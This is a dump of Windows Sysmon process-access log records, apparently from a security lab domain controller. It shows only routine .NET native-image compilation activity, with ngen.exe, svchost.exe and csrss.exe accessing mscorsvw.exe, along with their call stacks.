13:50:15.415{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C903-00000000A301}4820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C803-00000000A301}4796C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.291{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.275{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.275{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C703-00000000A301}3896C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.212{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C603-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.150{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.150{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.150{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C503-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:15.072{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:15.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9217-6005-C403-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008089Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008088Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.915{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008087Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.915{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D203-00000000A301}3152C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008086Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008085Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:16.837{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008084Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:16.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9218-6005-D103-00000000A301}1312C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008083Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
